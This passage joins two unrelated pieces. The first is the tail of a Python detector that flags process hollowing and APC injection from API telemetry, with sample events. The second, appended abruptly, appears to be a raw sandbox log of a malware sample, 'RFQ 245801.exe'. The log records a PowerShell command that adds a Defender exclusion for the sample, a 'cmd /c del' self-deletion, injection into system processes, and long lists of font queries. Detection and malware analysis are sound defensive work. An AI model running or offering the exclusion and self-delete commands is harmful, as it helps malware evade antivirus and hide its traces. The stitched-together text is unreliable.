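    "process_hollowing": {"required": ("write_pe", "set_context"),
                          "supporting": ("create_suspended", "unmap", "resume")},
    "apc_injection": {"required": ("map_rwx", "queue_apc"), "supporting": ()},
}


def stage_of(event):
    """Reduce one raw API event to an abstract stage name, or None if irrelevant."""
    api, args = event["api"], event["args"]
    if api == "CreateProcessW" and args.get("flags", 0) & CREATE_SUSPENDED:
        return "create_suspended"
    if api in ("NtUnmapViewOfSection", "ZwUnmapViewOfSection"):
        return "unmap"                                   # original image hollowed out
    if api in ("NtWriteVirtualMemory", "WriteProcessMemory") and args.get("data", b"")[:2] == b"MZ":
        return "write_pe"                                # a PE header lands in the target
    if api in ("NtSetContextThread", "SetThreadContext"):
        return "set_context"                             # entry point redirected
    if api in ("NtResumeThread", "ResumeThread"):
        return "resume"
    if api == "NtMapViewOfSection" and args.get("protect") == "PAGE_EXECUTE_READWRITE":
        return "map_rwx"                                 # RWX section mapped into the target
    if api == "NtQueueApcThread":
        return "queue_apc"
    return None


def correlate(events):
    """Return one finding per (source, target, technique) whose required stages appear in order."""
    seen = defaultdict(dict)                 # (src, dst) -> {stage: index of first occurrence}
    for i, ev in enumerate(events):
        if ev["pid"] == ev["target_pid"]:    # a process touching its own memory is not injection
            continue
        stage = stage_of(ev)
        if stage:
            seen[(ev["pid"], ev["target_pid"])].setdefault(stage, i)
    findings = []
    for (src, dst), stages in seen.items():
        for name, spec in TECHNIQUES.items():
            order = [stages.get(s) for s in spec["required"]]
            if None in order or order != sorted(order):
                continue
            evidence = [s for s in spec["required"] + spec["supporting"] if s in stages]
            findings.append({"technique": name, "source": src, "target": dst, "evidence": evidence})
    return findings


def ev(pid, target_pid, api, **args):
    return {"pid": pid, "target_pid": target_pid, "api": api, "args": args}


# Constructed telemetry: 1000 = RFQ 245801.exe, 1001 = its hollowed child, 2580 = explorer.exe
SAMPLE_EVENTS = [
    ev(1000, 1001, "CreateProcessW", image=r"C:\Users\user\Desktop\RFQ 245801.exe", flags=CREATE_SUSPENDED),
    ev(1000, 1001, "NtUnmapViewOfSection", base=0x400000),
    ev(1000, 1001, "NtWriteVirtualMemory", base=0x400000, data=b"MZ\x90\x00\x03\x00"),   # 4D5A at image base
    ev(1000, 1001, "NtSetContextThread", eip=0x4012F0),
    ev(1000, 1001, "NtResumeThread"),
    ev(1001, 1001, "NtWriteVirtualMemory", base=0x1B90000, data=b"MZ\x90\x00"),          # self-write, ignored
    ev(1001, 2580, "NtMapViewOfSection", protect="PAGE_EXECUTE_READWRITE"),
    ev(1001, 2580, "NtQueueApcThread", thread_id=4321),
    ev(3000, 3001, "WriteProcessMemory", base=0x7FF000, data=b"\x00\x00"),               # no PE header: benign
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['technique']}: {f['source']} -> {f['target']} via {', '.join(f['evidence'])}")
```

Requiring the stages in order is what keeps a debugger or an installer that merely writes a PE header into another process from tripping the hollowing rule: without the later context change the write alone yields nothing, and the supporting stages (suspended creation, unmap, resume) are reported as evidence rather than being mandatory, because not every loader variant performs all of them.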
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe 7_2_006438D2
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_006458B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_006458B6
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4150770824.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Users\user\Desktop\RFQ 245801.exe VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
